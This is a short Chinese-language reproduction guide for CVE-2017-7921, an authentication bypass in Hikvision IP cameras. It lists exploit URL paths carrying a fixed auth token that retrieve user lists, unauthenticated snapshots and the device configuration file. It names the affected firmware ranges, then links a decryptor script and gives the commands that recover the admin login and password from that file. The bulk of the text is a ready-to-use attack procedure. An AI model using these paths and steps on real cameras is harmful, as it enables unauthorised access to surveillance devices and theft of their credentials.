---

漏洞描述

0x01 CVE-2017-7921漏洞复现

许多HikvisionIP摄像机包含一个后门，允许未经身份验证的模拟任何配置的用户帐户。

0x02 漏洞复现：

利用工具发现漏洞（CVE-2017-7921）：

利用路径：/Security/users?auth=YWRtaW46MTEK

附：检索所有用户及其角色的列表
利用路径：/onvif-http/snapshot?auth=YWRtaW46MTEK

附：获取相机快照而不进行身份验证
利用路径：

/System/configurationFile?auth=YWRtaW46MTEK

附：下载摄像头配置账号密码文件

0x03 漏洞影响版本：

HikvisionDS-2CD2xx2F-ISeries5.2.0build140721

版本至5.4.0build160530版本；

DS-2CD2xx0F-ISeries5.2.0build140721

版本至5.4.0Build160401版本；

DS-2CD2xx2FWDSeries5.3.1build150410

版本至5.4.4Build161125版本；

DS-2CD4x2xFWDSeries5.2.0build140721

版本至5.4.0Build160414版本；

DS-2CD4xx5Series5.2.0build140721

版本至5.4.0Build160421版本；

DS-2DFxSeries5.2.0build140805

版本至5.4.5Build160928版本；

DS-2CD63xxSeries5.0.9build140305

版本至5.3.5Build160106版本

解密二进制文件（configurationFile）

1、脚本下载：

脚本链接：https://github.com/chrisjd20/hikvision_CVE-2017-7921_auth_bypass_config_decryptor

2、脚本使用方法：

依赖库：pycryptodome
依赖库安装：python -m pip install pycryptodome
因为我的电脑安装了两个版本的python，所以使用py -3
解密命令：
python decrypt_configurationFile.py configurationFile
红框中的就是后台登陆的账号密码